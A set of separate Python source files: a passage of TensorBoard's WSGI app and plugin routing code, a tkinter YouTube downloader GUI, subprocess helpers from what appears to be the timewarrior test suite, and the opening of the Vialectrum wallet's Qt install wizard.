"Plugin %r declared as both Angular built-in and legacy"
% plugin.plugin_name
)
if es_module_handler is not None:
raise ValueError(
"Plugin %r declared as both Angular built-in and iframed"
% plugin.plugin_name
)
loading_mechanism = {
"type": "NG_COMPONENT",
}
elif element_name is not None and es_module_handler is not None:
logger.error(
"Plugin %r declared as both legacy and iframed; skipping",
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
"type": "CUSTOM_ELEMENT",
"element_name": element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
"type": "IFRAME",
"module_path": "".join(
[
request.script_root,
DATA_PREFIX,
PLUGIN_PREFIX,
"/",
plugin.plugin_name,
es_module_handler,
]
),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
"type": "NONE",
}
output_metadata["loading_mechanism"] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, "application/json")
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](
environ, start_response
)
logger.warn("path %s not found, sending 404", clean_path)
return http_util.Respond(
request, "Not found", "text/plain", code=404
)(environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
      logdir_spec: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
      Groups without an explicit name are named after their path. If logdir_spec
      is None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir_spec.split(","):
        # Check whether the spec contains a group. A spec starting with xyz:// is
        # regarded as a URI path spec instead of a group spec. If the spec looks
        # like /foo:bar/baz, then we assume it's a path with a colon. If the spec
        # looks like [a-zA-Z]:\foo, then we assume it's a Windows path and not a
        # single-letter group.
if (
uri_pattern.match(specification) is None
and ":" in specification
and specification[0] != "/"
and not os.path.splitdrive(specification)[0]
):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(":")
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
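# Worked examples (illustrative only; paths are hypothetical and shown before
# realpath/expanduser normalization is applied):
#   parse_event_files_spec("run1:/data/a,/data/b") -> {"/data/a": "run1", "/data/b": None}
#   parse_event_files_spec("gs://bucket/logs")     -> {"gs://bucket/logs": None}  (URI left untouched)
#   parse_event_files_spec("/foo:bar/baz")         -> {"/foo:bar/baz": None}      (leading slash: path with a colon)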
def start_reloading_multiplexer(
multiplexer, path_to_run, load_interval, reload_task
):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError("load_interval is negative: %d" % load_interval)
def _reload():
while True:
start = time.time()
logger.info("TensorBoard reload process beginning")
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info(
"TensorBoard reload process: Reload the whole Multiplexer"
)
multiplexer.Reload()
duration = time.time() - start
logger.info(
"TensorBoard done reloading. Load took %0.3f secs", duration
)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == "process":
logger.info("Launching reload in a child process")
import multiprocessing
process = multiprocessing.Process(target=_reload, name="Reloader")
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ("thread", "auto"):
logger.info("Launching reload in a daemon thread")
thread = threading.Thread(target=_reload, name="Reloader")
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == "blocking":
if load_interval != 0:
raise ValueError(
"blocking reload only allowed with load_interval=0"
)
_reload()
else:
raise ValueError("unrecognized reload_task: %s" % reload_task)
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != "/" and path.endswith("/"):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
gui.py
|
# from functools import partial
from pathlib import Path
from importlib import resources
from threading import Event, Thread
import tkinter as tk
from tkinter import filedialog, ttk
import requests
from PIL import Image, ImageTk
from .about_window import AboutWindow
from utils.custom_paths import resource_path
from utils.custom_threads import KThread
from utils.youtube_downloader import YouTubeDownloader
class MainApp(ttk.Frame):
def __init__(self, master):
super().__init__(master)
self.master = master
self.grid(column=0, row=0, sticky=(tk.N, tk.W, tk.E, tk.S))
self.yt = YouTubeDownloader()
self.download_option = tk.IntVar()
self.output_dir = tk.StringVar()
self.output_file = tk.StringVar()
self.output_extension = tk.StringVar()
self.itag = tk.IntVar()
self.status_text = tk.StringVar()
self.download_running = tk.BooleanVar()
self.yt_url = tk.StringVar()
self.yt_title = tk.StringVar()
self.yt_thumbnail = None
self.yt_length = tk.StringVar()
self.yt_author = tk.StringVar()
self.yt_file_size = tk.DoubleVar()
self.yt_current_size = tk.DoubleVar()
self.thread_flag = Event()
self.customize_window()
self.create_styles()
self.create_widgets()
self.create_window_menu()
self.create_contextual_menu()
self.create_bindings()
self.additional_styling()
def customize_window(self):
self.master.resizable(tk.FALSE, tk.FALSE)
# self.master.iconbitmap('assets/favicon.ico')
# with resources.path('assets', 'icon.png') as icon_path:
# self._icon = tk.PhotoImage(file=icon_path)
icon_path = resource_path('assets', 'icon.png')
self._icon = tk.PhotoImage(file=icon_path)
self.master.iconphoto(True, self._icon)
self.master.title('YouTube Downloader')
self.master.columnconfigure(0, weight=1)
self.master.rowconfigure(0, weight=1)
def create_styles(self):
self.s = ttk.Style()
self.s.configure('Start.TButton', font='-weight bold', foreground='green', padding=10)
def toggle_check(self, *args):
if self.yt_url.get():
self.check_button['state'] = 'focus'
self.filemenu.entryconfigure('Check URL', state=tk.NORMAL)
else:
self.check_button['state'] = 'disabled'
self.filemenu.entryconfigure('Check URL', state=tk.DISABLED)
def toggle_download(self, *args):
self.streams_tree.delete(*self.streams_tree.get_children())
self.download_button['state'] = 'disabled'
self.filemenu.entryconfigure('Download', state=tk.DISABLED)
if self.yt_title.get():
self.status_text.set('Check URL again.')
def itag_select(self, e):
idx = e.widget.selection()[0]
# streams_tree.item(idx)['text']
self.itag.set(int(self.streams_tree.set(idx, column='itag')))
self.output_extension.set(self.streams_tree.set(idx, column='type'))
self.yt_file_size.set(float(self.streams_tree.set(idx, column='size')))
self.status_text.set(f'itag selected: {self.itag.get()}.')
self.download_button['state'] = 'focus'
self.filemenu.entryconfigure('Download', state=tk.NORMAL)
def check(self):
self.check_button.state(['disabled'])
self.filemenu.entryconfigure('Check URL', state=tk.DISABLED)
self.status_text.set('Checking provided url...')
try:
self.yt.check(self.yt_url.get(), self.download_option.get())
self.yt_title.set(self.yt.title)
self.output_file.set(self.yt.title)
self.yt_thumbnail = self.yt.thumbnail_url
self.yt_length.set(self.yt.length)
self.yt_author.set(self.yt.author)
# 'image'
image_obj = ImageTk.PhotoImage(Image.open(requests.get(self.yt_thumbnail, stream=True).raw))
self.image = ttk.Label(self.fileframe, image=image_obj)
# garbage collector prevention
self.image.image = image_obj
self.image.grid(column=1, row=3, sticky=(tk.W), pady=5, padx=5)
self.streams_tree.delete(*self.streams_tree.get_children())
for item in self.yt.streams_list:
self.streams_tree.insert('', 'end', values=item)
self.check_button['state'] = 'focus'
self.status_text.set('URL checked.')
except Exception as err:
self.status_text.set(f'Something went wrong with {err.__doc__}.')
def select_dir(self):
self.dirname = filedialog.askdirectory(title='Select destination folder', initialdir=self.output_dir.get())
if self.dirname:
self.output_dir.set(self.dirname)
self.status_text.set('Folder selected.')
def paste_url(self):
try:
self.yt_url.set(str(self.master.clipboard_get()).strip())
except tk.TclError:
pass
# stream, chunk, file_handle, bytes_remaining
def show_progress_bar(self, stream, chunk, bytes_remaining):
mbytes_downloaded = float(f'{(stream.filesize - bytes_remaining) / 1024**2:.2f}')
self.yt_current_size.set(mbytes_downloaded)
self.p_label['text'] = f'{self.yt_current_size.get()} / {self.yt_file_size.get()} MB'
def on_complete(self, stream, file_handle):
        self.itag.set(0)
        self.yt_file_size.set(0.0)
if not self.yt.file_complete():
self.status_text.set('Converting to mp3...')
self.yt.file_converter(file_handle)
# self.yt.convert()
# self.convert_thread = KThread(target=self.yt.convert, daemon=True)
# self.convert_thread.start()
self.status_text.set('Done.')
def download(self):
self.download_button['state'] = 'disabled'
self.cancel_button['state'] = 'focus'
self.filemenu.entryconfigure('Download', state=tk.DISABLED)
self.download_running.set(True)
self.yt_current_size.set(0.0)
self.progress_bar.configure(maximum=self.yt_file_size.get())
self.status_text.set('Downloading...')
self.yt.register_on_progress_callback(self.show_progress_bar)
self.yt.register_on_complete_callback(self.on_complete)
# self.yt.download(self.itag.get(), self.output_dir.get(), self.output_file.get())
self.download_thread = KThread(target=self.yt.download, daemon=True, args=(self.itag.get(),
self.output_dir.get(),
self.output_file.get(),
self.output_extension.get(),))
self.download_thread.start()
def cancel(self):
self.download_thread.kill()
self.download_button['state'] = 'focus'
self.cancel_button['state'] = 'disabled'
self.filemenu.entryconfigure('Download', state=tk.NORMAL)
self.status_text.set('Download canceled.')
def create_widgets(self):
self.download_option.set(1)
self.options_frame = ttk.Labelframe(self, text='Download options')
self.options_frame.grid(column=0, row=0, columnspan=1, sticky=(tk.W, tk.E), pady=5, padx=15)
self.rb1 = ttk.Radiobutton(self.options_frame, text='Single video', variable=self.download_option, value=1)
self.rb2 = ttk.Radiobutton(self.options_frame, text='Audio as "mp3"', variable=self.download_option, value=2)
self.rb1.grid(column=0, row=0, sticky=tk.W)
self.rb2.grid(column=0, row=1, sticky=tk.W)
self.download_option.trace_add('write', self.toggle_download)
# 'download button'
# self.download_button = ttk.Button(self, text='Download', state='disabled', style='Start.TButton',
# command=lambda: Thread(target=self.download).start())
self.download_button = ttk.Button(self, text='Download', state='disabled', style='Start.TButton',
command=self.download)
self.download_button.grid(column=1, row=0)
# 'cancel button'
self.cancel_button = ttk.Button(self, text='Cancel', state='disabled', command=self.cancel)
self.cancel_button.grid(column=2, row=0)
# 'url'
self.url_label = ttk.Label(self, text='YouTube URL: ')
self.url_label.grid(column=0, row=2, sticky=tk.E)
self.url_entry = ttk.Entry(self, width=50, textvariable=self.yt_url)
self.url_entry.grid(column=1, row=2, sticky=(tk.W, tk.E))
self.yt_url.trace_add('write', self.toggle_check)
# check_button = ttk.Button(mainframe, text='Check', state='disabled', command=partial(check, yt_url.get()))
self.check_button = ttk.Button(self, text='Check', state='disabled',
command=lambda: KThread(target=self.check, daemon=True).start())
self.check_button.grid(column=2, row=2)
# 'output dir'
self.dir_label = ttk.Label(self, text='Output dir: ')
self.dir_label.grid(column=0, row=3, sticky=tk.E)
self.output_dir.set(str(Path.home()))
self.dir_entry = ttk.Entry(self, width=50, textvariable=self.output_dir)
self.dir_entry.grid(column=1, row=3, sticky=(tk.W, tk.E))
self.dir_button = ttk.Button(self, text='Browse ...', command=self.select_dir)
self.dir_button.grid(column=2, row=3)
# 'file name'
self.file_label = ttk.Label(self, text='File name: ')
self.file_label.grid(column=0, row=4, sticky=tk.E)
self.file_entry = ttk.Entry(self, width=50, textvariable=self.output_file)
self.file_entry.grid(column=1, row=4, sticky=(tk.W, tk.E))
# 'streams tree'
        self.tree_label = ttk.Label(self, text='Quality options: ')
        self.tree_label.grid(column=0, row=8, sticky=(tk.N, tk.E))
self.treeframe = ttk.Frame(self)
self.treeframe.grid(column=1, row=8, columnspan=2, sticky=(tk.N, tk.W, tk.E, tk.S), pady=5)
tree_columns = ['itag', 'type', 'quality', 'size']
self.streams_tree = ttk.Treeview(self.treeframe, columns=tree_columns, height=5, padding=5, selectmode='browse')
self.streams_tree.column('#0', stretch=tk.NO, width=0, minwidth=0)
self.streams_tree.column('itag', width=50, minwidth=40, anchor='e')
self.streams_tree.column('type', width=100, minwidth=60, anchor='e')
self.streams_tree.column('quality', width=100, minwidth=60, anchor='e')
self.streams_tree.column('size', width=150, minwidth=100, anchor='e')
self.streams_tree.heading('itag', text='itag', anchor='e')
self.streams_tree.heading('type', text='File type', anchor='e')
self.streams_tree.heading('quality', text='Quality', anchor='e')
self.streams_tree.heading('size', text='Size [MB]', anchor='e')
self.streams_tree.grid(column=0, row=0, sticky=(tk.N, tk.W, tk.E, tk.S))
self.s = ttk.Scrollbar(self.treeframe, orient=tk.VERTICAL, command=self.streams_tree.yview)
self.s.grid(column=1, row=0, sticky=(tk.N, tk.S))
self.streams_tree['yscrollcommand'] = self.s.set
self.treeframe.grid_columnconfigure(0, weight=1)
self.treeframe.grid_rowconfigure(0, weight=1)
self.streams_tree.bind('<<TreeviewSelect>>', self.itag_select)
# 'File info'
self.fileframe = ttk.Labelframe(self, text='File info', width=280)
self.fileframe.grid(column=3, row=1, rowspan=9, columnspan=2, sticky=(tk.N, tk.W, tk.E, tk.S), pady=5, padx=15)
self.fileframe.grid_propagate(False)
ttk.Label(self.fileframe, text='Title: ').grid(column=0, row=0, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_title, wraplength=180).grid(column=1, row=0, sticky=(tk.W),
pady=5, padx=5)
ttk.Label(self.fileframe, text='Author: ').grid(column=0, row=1, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_author).grid(column=1, row=1, sticky=(tk.W), pady=5, padx=5)
ttk.Label(self.fileframe, text='Length: ').grid(column=0, row=2, sticky=(tk.E), pady=5)
ttk.Label(self.fileframe, textvariable=self.yt_length).grid(column=1, row=2, sticky=(tk.W), pady=5, padx=5)
ttk.Label(self.fileframe, text='Thumbnail: ').grid(column=0, row=3, sticky=(tk.N, tk.E), pady=5)
# 'separator'
self.s = ttk.Separator(self, orient=tk.HORIZONTAL)
self.s.grid(column=0, row=9, columnspan=3, sticky=(tk.E, tk.W), pady=30, padx=15)
# 'progressbar'
self.progress_bar = ttk.Progressbar(self, orient=tk.HORIZONTAL, variable=self.yt_current_size,
mode='determinate')
self.progress_bar.grid(column=0, row=10, columnspan=3, pady=5, padx=15, sticky=(tk.N, tk.W, tk.E, tk.S))
self.p_label = ttk.Label(self, text='0 MB')
self.p_label.grid(column=3, row=10, pady=5, padx=15, sticky=(tk.N, tk.W, tk.E, tk.S))
# 'status bar'
ttk.Label(self, textvariable=self.status_text, anchor=(tk.W), relief=tk.SUNKEN).grid(column=0, row=11,
columnspan=5,
sticky=(tk.W, tk.E))
def create_window_menu(self):
self.menubar = tk.Menu(self.master, tearoff=0)
self.filemenu = tk.Menu(self.menubar, tearoff=0)
self.filemenu.add_command(label='Output dir...', command=self.select_dir)
self.filemenu.add_command(label='Check URL', state=tk.DISABLED, command=self.check)
self.filemenu.add_command(label='Download', state=tk.DISABLED, command=self.download)
self.filemenu.add_separator()
self.filemenu.add_command(label='Exit', command=self.master.destroy)
self.menubar.add_cascade(label='File', menu=self.filemenu)
self.editmenu = tk.Menu(self.menubar, tearoff=0)
self.editmenu.add_command(label='Paste URL', command=self.paste_url)
self.menubar.add_cascade(label='Edit', menu=self.editmenu)
self.helpmenu = tk.Menu(self.menubar, tearoff=0)
self.helpmenu.add_command(label='About', command=lambda: AboutWindow(self.master))
self.menubar.add_cascade(label='Help', menu=self.helpmenu)
self.master.config(menu=self.menubar)
def create_contextual_menu(self):
self.contmenu = tk.Menu(self.master, tearoff=0)
self.contmenu.add_command(label='Paste URL', command=self.paste_url)
if (self.master.tk.call('tk', 'windowingsystem') == 'aqua'):
self.master.bind('<2>', lambda e: self.contmenu.post(e.x_root, e.y_root))
self.master.bind('<Control-1>', lambda e: self.contmenu.post(e.x_root, e.y_root))
else:
self.master.bind('<3>', lambda e: self.contmenu.post(e.x_root, e.y_root))
def create_bindings(self):
self.master.bind('<Return>', self.download)
def additional_styling(self):
for child in self.winfo_children():
child.grid_configure(padx=5, pady=5)
self.url_entry.focus()
|
utils.py
|
from __future__ import division
import atexit
import functools
import os
import signal
import sys
import tempfile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from time import sleep
try:
import simplejson as json
except ImportError:
import json
from .exceptions import CommandError, TimeoutWaitingFor
ON_POSIX = 'posix' in sys.builtin_module_names
# Directory relative to basetest module location
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
# Location of binary files (usually the src/ folder)
BIN_PREFIX = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "..", "src")
)
# Default location of test certificates
DEFAULT_CERT_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_certs")
)
# Default location of test extensions
DEFAULT_EXTENSION_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_extensions")
)
# Environment flags to control skipping of timew tests
TIMEW_SKIP = os.environ.get("TIMEW_SKIP", False)
# Environment flags to control use of PATH or in-tree binaries
TIMEW_USE_PATH = os.environ.get("TIMEW_USE_PATH", False)
UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}")
def timew_binary_location(cmd="timew"):
""" ../src/ is used by default; TIMEW_USE_PATH switches to resolving timew via $PATH."""
return binary_location(cmd, TIMEW_USE_PATH)
def binary_location(cmd, USE_PATH=False):
""" ../src/ is used by default; pass USE_PATH=True to resolve cmd via $PATH instead."""
return cmd if USE_PATH else os.path.join(BIN_PREFIX, cmd)
def wait_condition(cond, timeout=1, sleeptime=.01):
"""Wait for condition to return anything other than None"""
# NOTE Increasing sleeptime can dramatically increase testsuite runtime
# It also reduces CPU load significantly
if timeout is None:
timeout = 1
if timeout < sleeptime:
print("Warning, timeout cannot be smaller than", sleeptime)
timeout = sleeptime
# Max number of attempts until giving up
tries = int(timeout / sleeptime)
for i in range(tries):
val = cond()
if val is not None:
break
sleep(sleeptime)
return val
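# Illustrative usage (not part of the original module): poll for a flag file for up to ~2 seconds.
# Note the callable must return None to keep waiting, so a bare os.path.exists() would stop
# immediately on False:
#   found = wait_condition(lambda: True if os.path.exists("flag") else None, timeout=2)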
def wait_process(pid, timeout=None):
"""Wait for process to finish"""
def process():
try:
os.kill(pid, 0)
except OSError:
# Process is dead
return True
else:
# Process is still ticking
return None
return wait_condition(process, timeout)
def _queue_output(arguments, pidq, outputq):
"""Read/Write output/input of given process.
This function is meant to be executed in a thread as it may block
"""
kwargs = arguments["process"]
input = arguments["input"]
try:
proc = Popen(**kwargs)
except OSError as e:
# pid None is read by the main thread as a crash of the process
pidq.put(None)
outputq.put((
"",
("Unexpected exception caught during execution: '{0}' . ".format(e)),
255)) # false exitcode
return
# Put the PID in the queue for main process to know.
pidq.put(proc.pid)
# Send input and wait for finish
out, err = proc.communicate(input)
if sys.version_info > (3,):
out, err = out.decode('utf-8'), err.decode('utf-8')
# Give the output back to the caller
outputq.put((out, err, proc.returncode))
def _retrieve_output(thread, timeout, queue, thread_error):
"""Fetch output from binary subprocess queues"""
# Try to join the thread on failure abort
thread.join(timeout)
if thread.is_alive():
# Join should have killed the thread. This is unexpected
raise TimeoutWaitingFor(thread_error + ". Unexpected error")
# Thread died so we should have output
try:
# data = (stdout, stderr, exitcode)
data = queue.get(timeout=timeout)
except Empty:
data = TimeoutWaitingFor("streams from program")
return data
def _get_output(arguments, timeout=None):
"""Collect output from the subprocess without blocking the main process if
subprocess hangs.
"""
# NOTE Increase this value if tests fail with None being received as
# stdout/stderr instead of the expected content
output_timeout = 0.1 # seconds
pidq = Queue()
outputq = Queue()
t = Thread(target=_queue_output, args=(arguments, pidq, outputq))
t.daemon = True
t.start()
try:
pid = pidq.get(timeout=timeout)
except Empty:
pid = None
# Process crashed or timed out for some reason
if pid is None:
return _retrieve_output(t, output_timeout, outputq, "Program to start")
# Wait for process to finish (normal execution)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq, "Program thread to join")
# If we reach this point we assume the process got stuck or timed out
for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):
# Start with lower signals and escalate if process ignores them
try:
os.kill(pid, sig)
except OSError as e:
# errno 3 (ESRCH) means the process finished/died between last check and now
if e.errno != 3:
raise
# Wait for process to finish (should die/exit after signal)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq, "Program to die")
# This should never happen but in case something goes really bad
raise OSError("Program stopped responding and couldn't be killed")
def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,
merge_streams=False, env=os.environ, timeout=None):
"""Run a subprocess and wait for it to finish"""
if input is None:
stdin = None
else:
stdin = PIPE
if merge_streams:
stderr = STDOUT
else:
stderr = PIPE
arguments = {
"process": {
"args": cmd,
"stdin": stdin,
"stdout": stdout,
"stderr": stderr,
"bufsize": -1,
"close_fds": ON_POSIX,
"env": env,
},
"input": input,
}
out, err, exit = _get_output(arguments, timeout)
if merge_streams:
if exit != 0:
raise CommandError(cmd, exit, out)
else:
return exit, out
else:
if exit != 0:
raise CommandError(cmd, exit, out, err)
else:
return exit, out, err
def run_cmd_wait_nofail(*args, **kwargs):
"""Same as run_cmd_wait but silence the exception if it happens"""
try:
return run_cmd_wait(*args, **kwargs)
except CommandError as e:
return e.code, e.out, e.err
def memoize(obj):
"""Keep an in-memory cache of function results given it's inputs"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
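# Illustrative usage (not part of the original module):
#   @memoize
#   def lookup(uuid):
#       return expensive_query(uuid)   # evaluated once per distinct argument set
# The cache key is str(args) + str(kwargs), so arguments need a stable str()/repr().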
try:
from shutil import which
which = memoize(which)
except ImportError:
# NOTE: This is shutil.which backported from python-3.3.3
@memoize
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode) and
not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path
# extensions. This will allow us to short circuit when given
# "python.exe". If it does match, only test that one, otherwise we
# have to try others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
def parse_datafile(file):
"""Parse .data files, treating files as JSON"""
data = []
with open(file) as fh:
for line in fh:
line = line.rstrip("\n")
# Turn [] strings into {} to be treated properly as JSON hashes
if line.startswith('[') and line.endswith(']'):
line = '{' + line[1:-1] + '}'
if line.startswith("{"):
data.append(json.loads(line))
else:
data.append(line)
return data
def mkstemp(data):
"""Create a temporary file that is removed at process exit"""
def rmtemp(name):
try:
os.remove(name)
except OSError:
pass
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data)
f.close()
# Ensure removal at end of python session
atexit.register(rmtemp, f.name)
return f.name
def mkstemp_exec(data):
"""Create a temporary executable file that is removed at process exit"""
name = mkstemp(data)
os.chmod(name, 0o755)
return name
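# Illustrative usage (not part of the original module): create a throwaway executable
# hook script that is removed again when the Python process exits.
#   hook_path = mkstemp_exec(b"#!/bin/sh\nexit 0\n")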
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from vialectrum import Wallet, WalletStorage
from vialectrum.util import UserCancelled, InvalidPassword
from vialectrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from vialectrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Vialectrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Viacoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
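# Sketch of how @wizard_dialog is used (inferred from the decorated methods below, not from
# separate documentation): the wizard calls e.g. self.restore_seed_dialog(run_next=..., test=...);
# the wrapper reads 'run_next' from kwargs, shows the dialog, turns GoBack/UserCancelled into
# navigation instead of letting them propagate, and forwards the dialog's return value(s) to run_next.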
